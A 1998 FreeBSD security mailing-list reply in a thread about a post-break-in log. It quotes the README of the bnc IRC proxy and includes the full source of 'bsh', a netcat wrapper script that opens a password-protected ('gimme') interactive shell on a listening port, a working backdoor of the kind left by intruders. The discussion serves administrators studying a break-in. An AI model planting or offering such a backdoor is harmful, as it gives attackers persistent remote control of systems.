Date:      Thu, 27 Aug 1998 20:21:41 -0700 (PDT)
From:      "Jan B. Koum " <jkb@best.com>
To:        "Timothy R. Platt" <tplatt@nethampton.com>
Cc:        security@FreeBSD.ORG
Subject:   Re: post breakin log

	Ugh.. you are right. I was thinking of bsh (I guess they both
start with b FWIW).

0wn# pwd
/usr/home/jkb/nc/scripts
0wn# cat bsh
#! /bin/sh
## a little wrapper to "password" and re-launch a shell-listener.
## Arg is taken as the port to listen on.  Define "NC" to point wherever.

NC=nc

case "$1" in
  ?* )
  LPN="$1"
  export LPN
  sleep 1
  echo "-l -p $LPN -e $0" | $NC > /dev/null 2>&1 &
  echo "launched on port $LPN"
  exit 0
  ;;
esac

# here we play inetd
echo "-l -p $LPN -e $0" | $NC > /dev/null 2>&1 &

while read qq ; do
case "$qq" in
# here's yer password
  gimme )
  cd /
  exec csh -i
  ;;
esac
done

-- Yan

www.best.com/~jkb/         Unix users of the world unite:
www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com
"Turn up the lights, I don't want to go home in the dark."

On Thu, 27 Aug 1998, Timothy R. Platt wrote:

>Huh? From the bnc distribution README (bnc is in the FreeBSD ports
>collection, btw):
>
>1.INTRODUCTION
>        BNC is a simple program designed to Proxy irc sessions.
>  It is user configurable using the file bnc.conf and includes
>         NOW INCLUDES VIRTUAL HOSTS!!! ;P
>
>2.COMPILATION
>        I would tell you how to un-tar/gz this file, but your
>  reading this so why would you need help :-)
>        To compile bnc simply type:
>  make
>
>3.CONFIGURATION
>        The configuration file give BNC the nessesary info to
>  process such as the port to bind to and what port to request
>  when a conn is requested, also passwords and maxusers.

>  type:
>  bnc
>
>5.CLIENT SIDE
>        When using various clients you connect to the server in
>  which the daemon is ran.  In ircii and other clients you will
>  have to give your password by typing /quote pass <password> to
>  continue, in Mirc you can simply /server bnc.server.net port pass
>  to connect.  Once your pass is ok'ed you can tell it to connect
>  to an irc server by typing /quote conn [irc.server.net] <port> <pass>.
>
>  added /quote VIP [Virtual.host]   for on the fly ip switching.  It must
>  be done before you /quote conn.
>

>6.GNU
>        Yeah you know how this works so just realize this is gnu.
>
>  multi-user, passwords, and other basic necessities.
[humiliating stuff sniped]